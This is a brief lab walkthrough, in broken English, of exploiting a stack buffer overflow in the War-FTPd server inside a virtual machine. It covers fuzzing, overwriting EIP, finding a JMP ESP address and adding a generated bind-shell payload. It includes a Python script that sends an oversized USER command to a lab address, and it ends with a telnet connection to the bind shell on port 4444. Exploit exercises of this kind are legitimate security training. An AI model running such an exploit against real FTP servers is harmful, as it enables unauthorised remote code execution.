Buffer Overflow

1.  in here i make software war-ftpd and ollydbg and windows in virtual box
2.  type ping "ip-target " and type nc "ip target"

3. running war-ftpd and ollydbg on virtual box

4. for result data more then 1000 byte, running the command

5. result command above

6. running war-ftpd, and then running ollydbg, then you must exsecusion file fuzzer.py in terminal, if ollydbg crash the succsesfully

and can Register EIP

7. to run this application simply input the value of ESP and EIP

8. place the payload into the stack,
 #!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 -len(buffer))
s.connect (('192.168.56.101',21))
data=s.recv(1204)
print ("Sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r \n')
data = s.recv (1204)
s.send ('PASS PASSWORD'+'\r \n')
s.close()
print("Finish")
 and this is the result

9. for finding JMP ESP, click view choose sub menu executable, and this result

and then find comannd type "JMP ESP", 

10. result customization with JMP ESP address

  11. open browser, type "127.0.0.1:55555

 choose payloads, and search type payloads "windows shell bind tcp"

the contetns in configuration, and click " Generate payloads"

is the results the "generate payloads"

12. open terminal again, copy results "generate payload "

save and exit

13.  open application war-ftpd, made to online.. after online, open terminal running fuzzer.py, if succesfully, running telnet type "  telnet 192.168.56.101 4444"

Congratulation !!!